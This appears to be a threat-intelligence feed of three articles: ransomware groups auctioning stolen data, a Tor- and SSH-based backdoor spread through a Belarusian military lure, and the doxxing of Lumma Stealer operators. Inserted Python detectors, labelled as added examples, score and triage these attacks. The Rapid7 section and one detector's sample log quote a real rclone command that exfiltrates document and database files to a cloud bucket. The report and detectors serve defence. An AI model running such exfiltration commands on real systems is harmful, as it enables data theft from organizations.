From Extortion to E-commerce: How Ransomware Groups Turn Breaches into Bidding Wars

24 November 2025 at 09:21

Ransomware has evolved from simple digital extortion into a structured, profit-driven criminal enterprise. Over time, it has led to the development of a complex ecosystem where stolen data is not only leveraged for ransom, but also sold to the highest bidder. This trend first gained traction in 2020 when the Pinchy Spider group, better known as REvil, pioneered the practice of hosting data auctions on the dark web, opening a new chapter in the commercialization of cybercrime.

In 2025, contemporary groups such as WarLock and Rhysida have embraced similar tactics, further normalizing data auctions as part of their extortion strategies. By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations. The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.

Anatomy of victim data auctions 

Most modern ransomware groups employ double extortion tactics, exfiltrating data from a victim’s network before deploying encryption. Afterward, they publicly claim responsibility for the attack and threaten to release the stolen data unless their ransom demand is met. This dual-pressure technique significantly increases the likelihood of payment.

In recent years, data-only extortion campaigns, in which actors forgo encryption altogether, have risen sharply. In fact, such incidents doubled in 2025, highlighting how the threat of data exposure alone has become an effective extortion lever. Most ransomware operations, however, continue to use encryption as part of their attack chain.

Certain ransomware groups have advanced this strategy by introducing data auctions when ransom negotiations with victims fail. In these cases, threat actors invite potential buyers, such as competitors or other interested parties, to bid on the stolen data, often claiming it will be sold exclusively to a single purchaser. In some instances, groups have been observed selling partial datasets, likely adjusted to a buyer’s specific budget or area of interest, while any unsold data is typically published on dark web leak sites.

This process is illustrated in Figure 1, under the assumption that the threat actor adheres to their stated claims. However, in practice, there is no guarantee that the stolen data will remain undisclosed, even if the ransom is paid. This highlights the inherent unreliability of negotiating with cybercriminals.

Figure 1 - Victim data auctioning process

This auction model provides an additional revenue stream, enabling ransomware groups to profit from exfiltrated data even when victims refuse to pay. It should be noted, however, that such auctions are often reserved for high-profile incidents. In these cases, the threat actors exploit the publicity surrounding attacks on prominent organizations to draw attention, attract potential buyers, and justify higher starting bids.

This trend is likely driven by the fragmentation of the ransomware ecosystem following the recent disruption of prominent threat actors, including 8Base and BlackSuit. This shift in cybercrime dynamics is compelling smaller, more agile groups to aggressively compete for visibility and profit through auctions and private sales to maintain financial viability. The emergence of the Crimson Collective in October 2025 exemplified this dynamic when the group auctioned stolen datasets to the highest bidder. Although short-lived, this incident served as a proof of concept (PoC) for the growing viability of monetizing data exfiltration independently of traditional ransom schemes.

Threat actor spotlight

WarLock

The WarLock ransomware group has been active since at least June 2025. The group targets organizations across North America, Europe, Asia, and Africa, spanning sectors from technology to critical infrastructure. Since its emergence, WarLock has rapidly gained prominence for its repeated exploitation of vulnerable Microsoft SharePoint servers, leveraging newly disclosed vulnerabilities to gain initial access to targeted systems.

The group adopts double extortion tactics, exfiltrating data from the victim’s systems before deploying its ransomware variant. In a recent incident to which Rapid7 responded, we observed the threat actor exfiltrating data from the victim to an S3 bucket using the Rclone tool. An anonymized version of the command used by the threat actor is shown below:

Rclone.exe copy \\localdirectory :s3 -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,mdf,sql,doc,xls,sql,bak,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m
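The command above has several traits a defender can score for in process-creation telemetry: a copy verb, a bare cloud remote (":s3") as the destination, a long --include list of document and database extensions, and high transfer parallelism. The following is an added example, not code from the Rapid7 post, that parses and scores command lines from a simple constructed log format (host=, user=, cmd=); the first sample line reuses the anonymized command from the post, the other two are constructed benign activity.

```python
"""Score rclone invocations in process-creation logs for exfiltration traits.

Added example, not Rapid7's code. Log format and sample events are
constructed; the first event reuses the anonymized WarLock command.
"""
import re
import shlex

# ":s3" or ":s3:bucket/path" names the backend inline (on-the-fly remote);
# "name:" or "name:path" is a configured remote. A single letter before the
# colon (C:\share) is a Windows drive, not a remote.
FLY_REMOTE = re.compile(r"^:([A-Za-z0-9_-]+)(?::.*)?$")
NAMED_REMOTE = re.compile(r"^[A-Za-z0-9_-]{2,}:")
COPY_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
SENSITIVE_EXTS = {
    "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "csv",
    "sql", "bak", "mdf", "ldf", "ndf", "db", "sqlite", "sqlite3", "dbf",
    "dwg", "dxf", "step", "stp", "stl", "iges", "ipt", "prt",
}
ALERT_THRESHOLD = 4

SAMPLE_LOG = [
    # Constructed events; the first reuses the anonymized WarLock command.
    r'2025-11-12T03:14:07Z host=WS-042 user=CORP\svc_backup cmd=Rclone.exe copy \\localdirectory :s3 -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,mdf,sql,doc,xls,sql,bak,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m',
    r"2025-11-12T03:15:22Z host=FS-01 user=CORP\backupsvc cmd=robocopy D:\data \\fileserver\share /MIR",
    r'2025-11-12T09:02:41Z host=WS-017 user=CORP\jdoe cmd=rclone.exe copy C:\Users\jdoe\Documents gdrive: --include "*.{docx,xlsx}" --transfers 2',
]


def _tokens(cmdline):
    """Split a Windows command line on whitespace, keeping backslashes and
    stripping one layer of quotes; '#' is not treated as a comment."""
    lex = shlex.shlex(cmdline, posix=False)
    lex.whitespace_split = True
    lex.commenters = ""
    out = []
    for tok in lex:
        if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'":
            tok = tok[1:-1]
        out.append(tok)
    return out


def remote_backend(tok):
    """Backend of an on-the-fly remote, 'named' for a configured remote,
    None for a local path or a flag."""
    if tok.startswith("-"):
        return None
    m = FLY_REMOTE.match(tok)
    if m:
        return m.group(1).lower()
    return "named" if NAMED_REMOTE.match(tok) else None


def include_extensions(args):
    """Extensions from --include "*.{a,b,c}" patterns; empty entries such as
    the ",," in the observed command are ignored."""
    exts = set()
    for i, tok in enumerate(args):
        if tok == "--include" and i + 1 < len(args):
            pattern = args[i + 1]
        elif tok.startswith("--include="):
            pattern = tok.split("=", 1)[1]
        else:
            continue
        for group in re.findall(r"\{([^}]*)\}", pattern):
            exts.update(e.strip().lower() for e in group.split(",") if e.strip())
    return exts


def flag_int(args, name, default=0):
    """Integer value of '--name N' or '--name=N'; default if absent/non-numeric."""
    for i, tok in enumerate(args):
        if tok == name and i + 1 < len(args):
            val = args[i + 1]
        elif tok.startswith(name + "="):
            val = tok.split("=", 1)[1]
        else:
            continue
        return int(val) if val.isdigit() else default
    return default


def analyze_command(cmdline):
    """Return (score, reasons); score 0 means the command is not rclone."""
    args = _tokens(cmdline)
    if not args or re.split(r"[\\/]", args[0])[-1].lower() not in ("rclone", "rclone.exe"):
        return 0, []
    score, reasons = 0, []
    verb = args[1].lower() if len(args) > 1 else ""
    if verb in COPY_VERBS:
        score += 1
        reasons.append(f"rclone {verb}")
    backends = [b for b in map(remote_backend, args[2:]) if b]
    if backends:
        score += 2
        reasons.append("cloud remote: " + ", ".join(backends))
    hits = include_extensions(args) & SENSITIVE_EXTS
    if len(hits) >= 5:
        score += 2
        reasons.append(f"{len(hits)} sensitive extensions in --include")
    parallel = max(flag_int(args, "--transfers"), flag_int(args, "--multi-thread-streams"))
    if parallel >= 8:
        score += 1
        reasons.append(f"high parallelism ({parallel})")
    return score, reasons


def scan(lines, threshold=ALERT_THRESHOLD):
    """Alerts for log lines whose command scores at or above the threshold."""
    alerts = []
    for line in lines:
        event, sep, cmd = line.partition(" cmd=")
        if not sep:
            continue
        score, reasons = analyze_command(cmd)
        if score >= threshold:
            alerts.append({"event": event, "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["event"], alert["score"], "; ".join(alert["reasons"]))
```

The scoring deliberately does not fire on the name of the binary alone: an administrator syncing a small Documents folder to a configured remote with two transfers scores below the threshold, while the observed command scores on every trait. In production the same logic would run over Sysmon Event ID 1 or EDR process-creation records, and a renamed rclone binary would need to be caught by hash or by the distinctive flag set rather than by the image name.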

WarLock operates a dedicated leak site (DLS) on the dark web, where it lists its victims. From the outset of its operations, the group has auctioned stolen data, publishing only the unsold information online (Figure 2). In its ransom note, the group further states that the exfiltrated data may be sold to third parties if the victim refuses to pay (Figure 3).

Figure 2 - Example of purchased data

Figure 3 - WarLock ransom note

Although WarLock shares updates on the progress and results of these auctions through its DLS, it also relies heavily on its presence on the RAMP4 cybercrime forum to attract potential buyers (Figure 4). This approach likely allows WarLock to reach a wider buyer base by publishing these posts under the relevant thread “Auction \ 拍卖会”. It should be noted that WarLock is assessed to be of Chinese origin, which is further supported by the Chinese-language reference in this thread title.

Figure 4 - Mention of an auction on WarLock’s DLS

Using the alias “cnkjasdfgd,” the group advertises details about the nature and volume of exfiltrated data, along with sample files (Figure 5). WarLock further directs interested buyers to its Tox account, a peer-to-peer encrypted messaging and video-calling platform, where the auctions appear to take place.

Figure 5 - WarLock’s post on RAMP4

This approach appears to be highly effective for WarLock. Despite being a recent entrant to the ransomware ecosystem, the group has reportedly sold victim data in approximately 55% of its claimed attacks, accounting for 55 victims to date as of November 2025, demonstrating significant traction within underground markets. The remaining victims’ data has been publicly released on the group’s DLS, following unsuccessful ransom negotiations and a lack of interested buyers.

Rhysida

The Rhysida ransomware group was first identified by cybersecurity researchers in May 2023. The group primarily targets Windows operating systems across both public and private organizations in sectors such as government, defense, education, and manufacturing. Its operations have been observed in several countries, including the United Kingdom, Switzerland, Australia, and Chile. The threat actors portray themselves as a so-called “cybersecurity team” that assists organizations in securing their networks by exposing system vulnerabilities.

Rhysida maintains an active DLS, where it publishes data belonging to victims who refuse to pay the ransom, in alignment with double extortion tactics. Since at least June 2023, the group has also conducted data auctions via a dedicated “Auctions Online” section of its DLS. These auctions typically run for seven days, and Rhysida claims that each dataset is sold exclusively to a single buyer. As of mid-October 2025, the group was hosting five ongoing auctions, with starting prices ranging from 5 to 10 Bitcoin (Figure 6).

Figure 6 - Example of an auction on Rhysida’s DLS

Once the auction period ends, Rhysida publicly releases any unsold data on its DLS (Figure 7). If instead the auction is successful, the data is marked as “sold” and is not released on the group’s DLS (Figure 8). In many cases, the group publishes only a subset of the stolen data, often accompanied by the note “not sold data was published” (Figure 9).

Figure 7 - Example of full data release on Rhysida’s DLS

Figure 8 - Example of sold data on Rhysida’s DLS

Figure 9 - Example of partial data release on Rhysida’s DLS

With 224 claimed attacks as of November 2025, approximately 67% of which resulted in full or partial data sales, auctions represent a significant additional revenue stream for Rhysida. The group’s auction model appears to be considerably more effective than WarLock’s (Figure 10), likely due to Rhysida’s established reputation within the cybercrime ecosystem and its involvement in several high-profile attacks.

Figure 10 - Overview of auction outcomes

Conclusion

The cyber extortion ecosystem is undergoing a profound transformation, shifting from traditional ransom payments to a diversified, market-driven model centered on data auctions and direct sales. This evolution marks a turning point in how ransomware groups generate revenue, transforming what were once isolated extortion incidents into structured commercial transactions.

Groups such as WarLock and Rhysida exemplify this shift, illustrating how ransomware operations increasingly mirror illicit e-commerce ecosystems. By auctioning exfiltrated data, these actors not only create additional revenue streams but also reduce their dependence on ransom compliance, monetizing stolen data even when victims refuse to pay. This approach has proven particularly lucrative for these threat actors, likely setting a precedent for newer extortion groups eager to replicate their success.

As a result, proprietary and sensitive data, including personally identifiable and financial information, is flooding dark web marketplaces at an unprecedented pace. This expanding secondary market intensifies both the operational and reputational risks faced by affected organizations, extending the impact of an attack well beyond its initial compromise.

To adapt to this evolving threat landscape, organizations must move beyond reactive crisis management and embrace a proactive, intelligence-driven defense strategy. Continuous dark web monitoring, early breach detection, and the integration of cyber threat intelligence into response workflows are now essential. In a world where stolen data functions as a tradable commodity, resilience depends not on negotiation but on vigilance, preparedness, and rapid action.

Cyble Detects Advanced Backdoor Targeting Defense Systems via Belarus Military Lure

Cyble Research and Intelligence Labs (CRIL) has uncovered a cyber-espionage operation that used a weaponized ZIP archive to infiltrate defense-sector systems. The malicious file—disguised as a Belarusian military document titled “ТЛГ на убытие на переподготовку.pdf” (“TLG for departure for retraining.pdf”)—delivered a highly advanced backdoor capable of establishing covert access through SSH and Tor.

The campaign specifically leveraged the Belarusian military theme to deceive personnel linked to Special Operations Command and those specializing in UAV or drone operations. CRIL’s findings suggest the attack aimed to gather intelligence about the region’s unmanned aerial capabilities or possibly mask the attacker’s true identity through a false-flag narrative.

This operation builds on methods first observed in the December 2024 “Army+” campaign, previously attributed to the Sandworm group (APT44/UAC-0125). The October 2025 version shows notable technical evolution, employing improved obfuscation, operational security, and anonymization measures.

Infection Chain and Anti-Detection Measures 

The malicious ZIP archive was carefully constructed to evade both human suspicion and automated detection. Inside the ZIP archive, the victim would find an LNK shortcut masquerading as a PDF file and a hidden folder named “FOUND.000” containing another compressed file, persistentHandlerHashingEncodingScalable.zip. When executed, the LNK shortcut launched an obfuscated PowerShell script instead of opening a legitimate document.

The PowerShell payload extracted files to the %appdata%\logicpro directory and ran additional code that maintained stealth through obfuscation and environmental awareness. Before executing, it checked that the infected system contained at least ten recent shortcut files and fifty or more running processes—conditions typical of real user environments but not sandboxes. If these checks fail, the script terminates, effectively bypassing automated malware analysis systems.

While the decoy PDF was opened to distract the victim, the malware silently proceeded to install persistent services in the background.
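The archive layout described above, as an added example that is not part of the Cyble report: a Python check of the kind a mail gateway or sandbox pre-filter could run over an attachment. It builds, in memory, a constructed ZIP with the same shape the report describes (a shortcut named to look like the PDF, a FOUND.000 folder holding a nested ZIP with the renamed binaries) and reports the traits a filter should catch: double extensions, shortcut files, nested archives, executables inside nested archives, and folder names that mimic CHKDSK recovery directories. Member names follow the report; their contents, the exact shortcut file name and the task template name are constructed placeholders.

```python
"""Inspect a ZIP attachment for the lure traits described in the report.

Added example, not Cyble's code. The sample archives are constructed in
memory; member names follow the report, contents are placeholder bytes.
"""
import io
import re
import zipfile

EXECUTABLE_EXTS = {"lnk", "exe", "scr", "js", "jse", "vbs", "vbe", "hta",
                   "bat", "cmd", "ps1", "msi", "dll"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf"}
ARCHIVE_EXTS = {"zip", "7z", "rar", "iso", "img", "cab"}
# Windows shell link header: HeaderSize 0x4C followed by the ShellLink CLSID.
LNK_MAGIC = b"L\x00\x00\x00\x01\x14\x02\x00"
ZIP_MAGIC = b"PK\x03\x04"
RECOVERY_DIR = re.compile(r"^found\.\d{3}$", re.I)  # CHKDSK-style FOUND.000


def inspect_entry(name, data, depth):
    """Findings for one archive member; depth is 0 for the outer archive."""
    findings = []
    parts = name.split("/")
    base = parts[-1]
    exts = base.lower().split(".")[1:]
    final = exts[-1] if exts else ""
    if any(RECOVERY_DIR.match(p) for p in parts[:-1]):
        findings.append(f"folder named like a CHKDSK recovery directory: {name}")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and final in EXECUTABLE_EXTS:
        findings.append(f"double extension masquerading as .{exts[-2]}: {name}")
    if final == "lnk" or data.startswith(LNK_MAGIC):
        findings.append(f"Windows shortcut: {name}")
    elif (final in EXECUTABLE_EXTS or data.startswith(b"MZ")) and depth > 0:
        findings.append(f"executable inside nested archive (depth {depth}): {name}")
    if final in ARCHIVE_EXTS or data.startswith(ZIP_MAGIC):
        findings.append(f"nested archive (depth {depth}): {name}")
    return findings


def inspect_zip(blob, depth=0, max_depth=3):
    """Recursively inspect an in-memory ZIP; returns a flat list of findings."""
    findings = []
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as z:
            for info in z.infolist():
                if info.is_dir():
                    continue
                data = z.read(info)
                findings.extend(inspect_entry(info.filename, data, depth))
                if data.startswith(ZIP_MAGIC) and depth < max_depth:
                    findings.extend(inspect_zip(data, depth + 1, max_depth))
    except zipfile.BadZipFile:
        findings.append(f"unreadable archive (depth {depth})")
    return findings


def build_sample_lure():
    """Constructed archive with the shape the report describes."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("githubdesktop.exe", b"MZ placeholder")   # renamed OpenSSH (placeholder bytes)
        z.writestr("pinterest.exe", b"MZ placeholder")       # renamed Tor (placeholder bytes)
        z.writestr("task_ssh.xml", b"<Task/>")               # constructed task template name
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        # Shortcut name is an assumption: the report's title plus a .lnk extension.
        z.writestr("ТЛГ на убытие на переподготовку.pdf.lnk", LNK_MAGIC + b"\x00" * 64)
        z.writestr("FOUND.000/persistentHandlerHashingEncodingScalable.zip", inner.getvalue())
    return outer.getvalue()


def build_benign_sample():
    """Constructed archive with a single plain PDF, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("invoice.pdf", b"%PDF-1.7 placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_zip(build_sample_lure()):
        print(finding)
```

The magic-byte checks matter more than the extension checks: a shortcut or a nested archive renamed to a harmless extension still starts with the same header bytes, and a filter keyed only on names would pass it. The recursion depth cap keeps a deliberately deep or self-referential archive from exhausting the filter.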

Scheduled Tasks, Persistence, and Backdoor Setup 

Persistence was achieved through scheduled tasks created using XML templates extracted from the ZIP archive. Two tasks were registered: one to deploy OpenSSH for Windows (renamed as githubdesktop.exe) and another to run a modified Tor client (renamed as pinterest.exe).

The OpenSSH binary established a local SSH service on port 20321 using only RSA key-based authentication, disabling passwords entirely. The authorized keys and configuration files were stored in hidden directories under AppData\Roaming\logicpro. In parallel, the Tor service created a hidden .onion address and forwarded several critical ports: 
  • SSH (20322 → 127.0.0.1:20321) 
  • SMB (11435 → 127.0.0.1:445) 
  • RDP (13893 → 127.0.0.1:3389) 
To conceal traffic, the malware employed the obfs4 protocol, disguising Tor communications as legitimate network traffic. Two bridge relays—77.20.116.133:8080 and 156.67.24.239:33333—served as entry points into the Tor network.

Once connected, the malware generated a unique .onion hostname and sent it to the attacker’s command-and-control server via a curl command routed through the Tor SOCKS5 proxy. The command used 1,000 retries with three-second intervals to ensure successful data delivery. This process gave the attacker continuous, anonymous access to the compromised host.

Attribution, Impact, and Defensive Measures 

CRIL’s analysis confirmed that the backdoor allowed full remote access through SSH, RDP, SFTP, and SMB channels, all tunneled through Tor for anonymity. Analysts verified the backdoor’s functionality by establishing a controlled SSH session using the embedded RSA keys and proxy configuration. No secondary payloads or lateral movements were detected, suggesting the attackers were in the reconnaissance phase.

The October 2025 sample closely resembles techniques used in the December 2024 Army+ campaign attributed to Sandworm (APT44). The overlap includes double-extension lures, scheduled task persistence, and the integration of OpenSSH and Tor for covert tunneling. Sandworm, associated with Russia’s GRU Unit 74455, has a long history of targeting Ukraine’s infrastructure, including the BlackEnergy attacks in 2015, the NotPetya outbreak in 2017, and a 2023 breach of Kyivstar.

Despite these similarities, CRIL maintains moderate confidence in linking this operation directly to Sandworm. The Belarusian military focus could reflect either an intelligence-gathering mission or a deliberate misdirection tactic.

To mitigate such threats, CRIL recommends that defense organizations: 
  • Strengthen email filtering to detect nested or double-extension ZIP archives. 
  • Train personnel to verify document authenticity through secondary channels. 
  • Deploy behavioral endpoint detection capable of flagging suspicious PowerShell activity and unauthorized scheduled tasks. 
  • Block or monitor Tor and obfs4 traffic at the network level. 
  • Audit SSH key usage and identify any OpenSSH instances running on non-standard ports. 
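The persistence chain described earlier (scheduled tasks launching renamed OpenSSH and Tor binaries from AppData, sshd on port 20321 with key-only authentication, and Tor hidden-service forwards onto the local SSH, SMB and RDP ports) and the recommendations just listed both come down to checking a handful of host artifacts. The following is an added example, not code from the Cyble report, that parses a Task Scheduler XML definition, an sshd_config and a torrc and reports those traits. All three sample artifacts are constructed for this example: the user name, task URI, ListenAddress and file paths are assumptions modeled on the report, while the ports, binary names and bridge addresses are the report's own.

```python
"""Host triage for the scheduled-task, OpenSSH and Tor artifacts of the backdoor.

Added example, not Cyble's code. The three artifacts below are constructed;
only the ports, binary names and bridge addresses come from the report.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads|Public)\\", re.I)
LOCAL_SERVICES = {22: "SSH", 445: "SMB", 3389: "RDP"}

# Constructed task definition; URI, user profile and the -f argument are assumptions.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GitHubDesktopUpdate</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\jdoe\AppData\Roaming\logicpro\githubdesktop.exe</Command>
      <Arguments>-f C:\Users\jdoe\AppData\Roaming\logicpro\sshd_config</Arguments>
    </Exec>
  </Actions>
</Task>"""

SSHD_CONFIG = r"""
# constructed sshd_config modeled on the report
Port 20321
ListenAddress 127.0.0.1
PubkeyAuthentication yes
PasswordAuthentication no
AuthorizedKeysFile C:\Users\jdoe\AppData\Roaming\logicpro\.ssh\authorized_keys
"""

TORRC = r"""
# constructed torrc modeled on the report; bridge fingerprints omitted
UseBridges 1
Bridge obfs4 77.20.116.133:8080
Bridge obfs4 156.67.24.239:33333
HiddenServiceDir C:\Users\jdoe\AppData\Roaming\logicpro\hs
HiddenServicePort 20322 127.0.0.1:20321
HiddenServicePort 11435 127.0.0.1:445
HiddenServicePort 13893 127.0.0.1:3389
"""


def task_commands(xml_text):
    """(task URI, [executables]) from a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext(f"{TASK_NS}RegistrationInfo/{TASK_NS}URI", default="<no URI>")
    cmds = [c.text.strip() for c in root.iter(f"{TASK_NS}Command") if c.text]
    return uri, cmds


def parse_sshd_config(text):
    """sshd_config as {lowercased keyword: first value}; comments skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, val = line.partition(" ")
        conf.setdefault(key.lower(), val.strip())
    return conf


def parse_torrc(text):
    """Hidden-service forwards [(virtual_port, host, port)], bridge addresses, transports."""
    forwards, bridges, transports = [], [], set()
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        key = parts[0].lower()
        if key == "hiddenserviceport" and len(parts) >= 3:
            host, _, port = parts[2].rpartition(":")   # a bare port means 127.0.0.1
            forwards.append((int(parts[1]), host or "127.0.0.1", int(port)))
        elif key == "bridge" and len(parts) >= 2:
            if ":" in parts[1]:                         # Bridge IP:PORT [fingerprint]
                transports.add("plain")
                bridges.append(parts[1])
            elif len(parts) >= 3:                       # Bridge <transport> IP:PORT ...
                transports.add(parts[1].lower())
                bridges.append(parts[2])
    return forwards, bridges, transports


def triage(task_xml, sshd_text, torrc_text):
    """Findings that tie the three artifacts together."""
    findings = []
    uri, cmds = task_commands(task_xml)
    for cmd in cmds:
        if USER_WRITABLE.search(cmd):
            findings.append(f"task {uri} runs a binary from a user-writable path: {cmd}")
    sshd = parse_sshd_config(sshd_text)
    port = int(sshd.get("port", "22"))
    services = dict(LOCAL_SERVICES)
    services[port] = "SSH"   # label forwards onto the sshd port as SSH even when non-standard
    if port != 22:
        pw = sshd.get("passwordauthentication", "yes")
        findings.append(f"sshd listening on non-standard port {port} (PasswordAuthentication {pw})")
    keys = sshd.get("authorizedkeysfile", "")
    if USER_WRITABLE.search(keys):
        findings.append(f"AuthorizedKeysFile under a user-writable path: {keys}")
    forwards, bridges, transports = parse_torrc(torrc_text)
    for vport, host, lport in forwards:
        if host in ("127.0.0.1", "localhost") and lport in services:
            findings.append(f"Tor hidden service exposes local {services[lport]} port {lport} as virtual port {vport}")
    if bridges:
        findings.append(f"Tor bridges ({', '.join(sorted(transports))}): {', '.join(bridges)}")
    return findings


if __name__ == "__main__":
    for finding in triage(TASK_XML, SSHD_CONFIG, TORRC):
        print(finding)
```

On a live host the inputs would come from the exported task definitions (schtasks /query /xml) and from any sshd_config or torrc found outside the expected program directories; the value of reading the sshd port first is that a HiddenServicePort target of 127.0.0.1:20321 is then recognised as an SSH exposure rather than an unknown port.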

Lumma Stealer Slowed by Doxxing Campaign

21 October 2025 at 13:33

The prolific threat actors behind the Lumma Stealer malware have been slowed by an underground doxxing campaign in recent months. Coordinated law enforcement action earlier this year didn’t do much to slow down the infostealer’s spread, but a recent doxxing campaign appears to have had an impact, according to researchers at Trend Micro. “In September 2025, we noted a striking decline in new command and control infrastructure activity associated with Lummastealer ... as well as a significant reduction in the number of endpoints targeted by this notorious malware,” threat analyst Junestherry Dela Cruz wrote in a recent post. Fueling the drop has been an underground exposure campaign targeting a key administrator, developer and other members of the group, which Trend tracks as “Water Kurita.”

Lumma Stealer Doxxing Campaign Began in August

The Lumma Stealer doxxing campaign began in late August and continued into October, and on September 17, Lumma Stealer’s Telegram accounts were also compromised. “Allegedly driven by competitors, this campaign has unveiled personal and operational details of several supposed core members, leading to significant changes in Lummastealer’s infrastructure and communications,” Dela Cruz wrote. “This development is pivotal, marking a substantial shake-up in one of the most prominent information stealer malware operations of the year. ... The exposure of operator identities and infrastructure details, regardless of their accuracy, could have lasting repercussions on Lummastealer’s viability, customer trust, and the broader underground ecosystem.”

The disclosures included highly sensitive details of five alleged Lumma Stealer operators, such as passport numbers, bank account information, email addresses, and links to online and social media profiles, and were leaked on a website called "Lumma Rats." While the campaign may have come from a rival, Dela Cruz said “the campaign’s consistency and depth suggest insider knowledge or access to compromised accounts and databases.”

“The exposure campaign was accompanied by threats, accusations of betrayal within the cybercriminal community, and claims that the Lumma Stealer team had prioritized profit over the operational security of their clients,” Dela Cruz wrote. While the researcher noted that the accuracy of the doxed information hasn’t been verified, the accompanying decline in Lumma Stealer activity suggests that the group “has been severely affected—whether through loss of key personnel, erosion of trust, or fear of further exposure.”

Vidar, StealC Gain from Lumma Stealer’s Decline

Lumma Stealer’s decline has been a boon for rival infostealers like Vidar and StealC, Dela Cruz noted, “with many users reporting migrations to these platforms due to Lumma Stealer’s instability and loss of support.” Lumma’s decline has also hit pay-per-install (PPI) services like Amadey that are widely used to deliver infostealer payloads, and rival malware developers have stepped up their marketing efforts, “fueling rapid innovation and intensifying competition among MaaS [Malware as a Service] providers, raising the likelihood of new, stealthier infostealer variants entering the market,” Dela Cruz said. According to Cyble dark web data, Vidar and Redline are the infostealers most rivaling Lumma in volume on dark web marketplaces selling stolen credentials, with StealC, Acreed, Risepro, Rhadamanthys and Metastealer among other stealer logs commonly seen on the dark web. As for Lumma Stealer, Dela Cruz noted that being a top cybercrime group isn’t exactly a secure - pardon the pun - position to be in, as RansomHub found out earlier this year. “[B]eing number one means facing scrutiny and attacks from both defenders and competitors alike,” the researcher noted.